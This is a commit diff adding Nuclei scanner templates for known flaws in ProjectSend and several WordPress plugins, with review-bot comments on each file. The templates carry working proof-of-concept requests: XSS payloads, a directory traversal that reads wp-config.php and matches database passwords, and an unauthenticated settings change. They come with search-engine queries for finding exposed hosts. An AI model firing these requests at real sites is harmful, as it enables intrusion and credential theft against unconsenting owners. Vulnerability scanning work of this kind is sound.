Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
1 parent 89d6187, commit 6100788
Showing 289 changed files with 16,760 additions and 1 deletion.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20241126 | ||
20241127 |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,64 @@ | ||
id: projectsend-auth-bypass | ||
|
||
info: | ||
name: ProjectSend <= r1605 - Improper Authorization | ||
author: DhiyaneshDK | ||
severity: high | ||
description: | | ||
An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application. | ||
reference: | ||
- https://www.projectsend.org/ | ||
- https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf | ||
metadata: | ||
verified: true | ||
max-request: 1 | ||
fofa-query: body="ProjectSend" | ||
shodan-query: html:"ProjectSend" | ||
tags: misconfig,projectsend,auth-bypass | ||
|
||
variables: | ||
string: "{{randstr}}" | ||
|
||
flow: http(1) && http(2) | ||
|
||
http: | ||
- raw: | ||
- | | ||
GET / HTTP/1.1 | ||
Host: {{Hostname}} | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'status_code == 200' | ||
- 'contains(body, "projectsend")' | ||
condition: and | ||
internal: true | ||
|
||
extractors: | ||
- type: regex | ||
name: csrf | ||
group: 1 | ||
regex: | ||
- 'name="csrf_token" value="([0-9a-z]+)"' | ||
internal: true | ||
|
||
- raw: | ||
- | | ||
POST /options.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
csrf_token={{csrf}}§ion=general&this_install_title={{string}} | ||
- | | ||
GET / HTTP/1.1 | ||
Host: {{Hostname}} | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'status_code_2 == 200' | ||
- 'contains(body_2, "{{string}}")' | ||
condition: and | ||
# digest: 4b0a00483046022100cbdf7867367646663d0f95096da7ed83173ecc5ad6edfbbb81fffd3afe8efcfa0221009cbb5bae0b46406c68174051fdff85191ee72553de70ffbb7e575a1b6c4b4aa1:922c64590222798bb761d5b6d8e72950 |
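Review bot: the body of the POST in the second `raw` block, `csrf_token={{csrf}}§ion=general&this_install_title={{string}}`, has lost the `&` that separates the `section` parameter (`&sect` has been rendered as `§`), so as written the request never sends `section=general` and the final check will fail on every host; it should read `csrf_token={{csrf}}&section=general&this_install_title={{string}}`. Two more points on the same hunk: `max-request: 1` understates the template, which issues three requests (one in `http(1)`, two in `http(2)`) and should say `max-request: 3`; and the verification is state-changing, because it overwrites the install title with a random string and never restores it, so either `description` should say so plainly or the template should send a follow-up POST that restores the original title, otherwise a routine scan leaves a visible modification on a production instance.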
poc/aws/CVE-2024-52475-3edf4604484e3bad3394912718ccec2e.yaml
59 changes: 59 additions & 0 deletions
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,59 @@ | ||
id: CVE-2024-52475-3edf4604484e3bad3394912718ccec2e | ||
|
||
info: | ||
name: > | ||
Wawp < 3.0.18 - Unauthenticated Privilege Escalation | ||
author: topscoder | ||
severity: critical | ||
description: > | ||
The Wawp OTP Verification, Order Notifications, and Country Code Selector for WooCommerce plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to 3.0.18 (exclusive). This makes it possible for unauthenticated attackers to gain access to administrator accounts. | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/da86d422-f0ef-439b-ae67-6cb9699073e0?source=api-prod | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cve-id: CVE-2024-52475 | ||
metadata: | ||
fofa-query: "wp-content/plugins/automation-web-platform/" | ||
google-query: inurl:"/wp-content/plugins/automation-web-platform/" | ||
shodan-query: 'vuln:CVE-2024-52475' | ||
tags: cve,wordpress,wp-plugin,automation-web-platform,critical | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/automation-web-platform/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "automation-web-platform" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '< 3.0.18') |
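Review bot: the two `version` extractors are identical except for `internal: true` on the first, so one of them is redundant; a single extractor without `internal: true` both feeds `compare_versions` in the DSL matcher and surfaces the version in the output. `classification` carries `cvss-metrics`, `cvss-score` and `cve-id` but no `cwe-id`, which the other CVE templates in this commit do fill in. The file also lands under `poc/aws/` although it targets a WordPress plugin and is tagged `wordpress,wp-plugin`; anyone selecting templates by directory will miss it.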
poc/config/wp-ispconfig3-787a6b689d770056f7efffb5964871d1.yaml
59 changes: 59 additions & 0 deletions
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,59 @@ | ||
id: wp-ispconfig3-787a6b689d770056f7efffb5964871d1 | ||
|
||
info: | ||
name: > | ||
WP-ISPConfig 3 <= 1.5.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting | ||
author: topscoder | ||
severity: medium | ||
description: > | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/5b2813d6-6ef5-4629-b079-bec3ad25d661?source=api-scan | ||
classification: | ||
cvss-metrics: | ||
cvss-score: | ||
cve-id: | ||
metadata: | ||
fofa-query: "wp-content/plugins/wp-ispconfig3/" | ||
google-query: inurl:"/wp-content/plugins/wp-ispconfig3/" | ||
shodan-query: 'vuln:' | ||
tags: cve,wordpress,wp-plugin,wp-ispconfig3,medium | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/wp-ispconfig3/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "wp-ispconfig3" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 1.5.6') |
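Review bot: `description: >`, `cvss-metrics:`, `cvss-score:` and `cve-id:` are all empty and `shodan-query: 'vuln:'` has no identifier, yet `tags` still carries `cve`; an empty `cve-id` is a YAML null that will not pass template validation, and an empty description gives the operator nothing to act on when the version check fires. Either fill these fields from the Wordfence advisory linked under `reference` or drop the empty keys and the `cve` tag until an identifier exists. The duplicated `version` extractor (an `internal: true` copy and a plain copy of the same regex) can be collapsed into one here as well.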
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
id: CVE-2011-4624 | ||
|
||
info: | ||
name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter. | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
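Review bot: `name` says `GRAND FlAGallery 1.57` while `description` says `before 1.57`, so the affected range is ambiguous; the name should state the same bound as the description (for example `< 1.57`). `reference` is a bare string here whereas every other template in this commit uses a list, `requests:` is the legacy protocol key (the first files in this commit already use `http:`), and there is no `classification` block although the template has a CVE id. Normalising these three items will let the file validate against the current template schema alongside the others.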
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
id: CVE-2011-5181 | ||
info: | ||
name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting | ||
author: daffainfo | ||
severity: medium | ||
description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
classification: | ||
cve-id: CVE-2011-5181 | ||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
# Enhanced by mp on 2022/02/21 |
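Review bot: `reference` should be a list and `requests:` is the legacy key, as in the previous template; `classification` has only `cve-id` with no `cvss-metrics` or `cwe-id`, and `tags` sits between `reference` and `classification`, which breaks the key order used elsewhere in this commit. The body matcher paired with the `text/html` header check is the right way to confirm reflection rather than a plain echo; the `# Enhanced by mp on 2022/02/21` trailer is harmless but would be more useful as a `metadata` entry where tooling can read it.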
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
id: CVE-2013-2287 | ||
info: | ||
name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting | ||
author: daffainfo | ||
severity: medium | ||
description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter. | ||
reference: | ||
- https://nvd.nist.gov/vuln/detail/CVE-2013-2287 | ||
- https://www.dognaedis.com/vulns/DGS-SEC-16.html | ||
classification: | ||
cve-id: CVE-2013-2287 | ||
metadata: | ||
google-query: inurl:"/wp-content/plugins/uploader" | ||
tags: cve,cve2013,wordpress,xss,wp-plugin | ||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
# Enhanced by mp on 2022/02/21 |
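Review bot: the description names two injectable parameters, `notify` and `blog`, but the single request only places the payload in `blog` (with `notify=unnotif`), so the template never exercises the first vector; if full coverage is intended, add a second path entry carrying the payload in `notify`, otherwise narrow the description to the parameter actually tested. `requests:` is again the legacy key, and `tags` again follows `metadata` rather than the order used by the `http:`-based templates earlier in this commit.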
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
id: CVE-2013-7240 | ||
|
||
info: | ||
name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal | ||
author: daffainfo | ||
severity: high | ||
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. | ||
reference: | ||
- https://www.exploit-db.com/exploits/38936 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240 | ||
tags: cve,cve2013,wordpress,wp-plugin,lfi | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2013-7240 | ||
cwe-id: CWE-22 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "DB_NAME" | ||
- "DB_PASSWORD" | ||
- "DB_HOST" | ||
- "The base configurations of the WordPress" | ||
part: body | ||
condition: and | ||
|
||
- type: status | ||
status: | ||
- 200 |
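Review bot: the proof request fetches `wp-config.php` and the matcher confirms on `DB_NAME`, `DB_PASSWORD` and `DB_HOST`, so a positive result means the target's live database credentials have been pulled into the scanner's response buffer and will be persisted by any response or debug logging that is enabled. Matching only on the `The base configurations of the WordPress` banner, or on a less sensitive file that the same traversal reaches, would confirm the bug with the same certainty and far less exposure; at minimum the `description` should warn operators that the response contains secrets. Separately, `tags` is placed before `classification` and `requests:` is the legacy key.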
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,41 @@ | ||
id: CVE-2014-4536 | ||
|
||
info: | ||
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting | ||
author: daffainfo | ||
severity: medium | ||
description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter. | ||
reference: | ||
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f | ||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536 | ||
- http://wordpress.org/plugins/infusionsoft/changelog | ||
- http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2014-4536 | ||
cwe-id: CWE-79 | ||
tags: cve,cve2014,wordpress,wp-plugin,xss | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- '"></script><script>alert(document.domain)</script>' | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
|
||
# Enhanced by mp on 2022/02/24 |
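Review bot: the body matcher can never fire, because it looks for `"></script><script>alert(document.domain)</script>` and none of the three payloads in the path decode to that string: `go` and `campaignId` carry `"><script>alert(document.cookie)</script>` (no leading `</script>`, and `document.cookie` rather than `document.domain`), and `contactId` carries `'></script><script>alert(document.domain)</script>` with a single quote rather than a double quote. Use one payload for all three parameters and match on exactly that, and drop the stray trailing `&` from the path. `name` (`< 1.5.7`) and `description` (`before 1.5.6`) also disagree on the fixed version; one of them should be corrected to match the changelog linked under `reference`.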
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
id: CVE-2015-6920 | ||
info: | ||
name: sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: WordPress sourceAFRICA plugin version 0.1.3 suffers from a cross site scripting vulnerability. | ||
reference: | ||
- https://packetstormsecurity.com/files/133371/ | ||
- https://nvd.nist.gov/vuln/detail/CVE-2015-6920 | ||
tags: cve,cve2015,wordpress,wp-plugin,xss | ||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- '"></script><script>alert(document.domain)</script>' | ||
part: body | ||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
- type: status | ||
status: | ||
- 200 |
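Review bot: `name` says `<= 0.1.3` while `description` says only `version 0.1.3`; if 0.1.3 is the last affected release the description should say so, and if a fixed version is known it belongs in both. There is no `classification` block despite the CVE id, no `metadata` (the `google-query` style used in CVE-2013-2287 would fit here), and `requests:` is the legacy key. The payload and the `"></script><script>alert(document.domain)</script>` matcher do agree in this template, so the reflection check itself is sound.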